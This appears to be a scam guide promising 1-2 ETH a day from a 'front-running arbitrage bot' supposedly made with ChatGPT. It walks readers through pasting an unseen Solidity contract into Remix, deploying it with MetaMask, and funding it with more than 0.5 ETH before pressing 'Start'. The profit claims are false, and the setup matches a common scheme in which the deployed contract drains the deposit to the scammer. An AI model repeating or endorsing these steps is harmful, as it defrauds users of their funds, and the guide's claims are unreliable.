How to make 1 2ETH per Day Passive Arbitrage Bot on Chat GPT Just copy and paste

How to make 1 2ETH per Day Passive Arbitrage Bot on Chat GPT Just copy and paste

Hello! It's Jacob! I’m thrilled to introduce you to the ways ChatGPT can make your life easier. This guide offers clear, step-by-step instructions to help you get started effortlessly and make the most of this powerful tool. 🎓 STEP BY STEP INSTRUCTIONS: 🔹 Install MetaMask: If you have problems in this step, check out the MetaMask installation video on our channel: • MetaMask Installation Instructions 🔹 Then go to the Remix: (THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK) 🔹 Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”. Make sure it ends with .sol for Ethereum programming language. Note: There is a problem if the text is not colored when you create bot.sol. Simply refresh the browser and then paste rentry codes again. ✳️ Put THIS code into Remix compiler: 🔹 Head over to “Compiler” tab in remix and choose version 0.6.6 and press “Compile” button. 🔹 Then go to the “DEPLOY & RUN TRANSACTIONS” section in Remix, and choose the “Injected Provider - MetaMask” option in environment. And then use the “Deploy” option. This option allows you to create your own smart-contract. To pay gas for creating smart-contract confirm message in your Metamask. Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button. In this case mine would be "OneinchSlippageBot - bot.sol". Also if you get this message after deployment "Failed to publish metadata file to ipfs, please check the ipfs gateways is available. [{},{},{}] ". You can just ignore it and continue. This feature is to publish your bot to IPFS. Its not necessary, because the bot is in the blockchain and can be accessed through Remix. 🔹 Fund your bot to be able to frontrun transactions. Make sure your deposit is more than 0.5 ETH(to prevent negating slippage) to your exact contract/bot address. 🔹 Use the "Start" button to send the bot a command to start working and make transactions. 🔹 To return ethers to your wallet from a smart contract, click on the "Withdraw" button. Cause of assets can be used in the deal at the moment.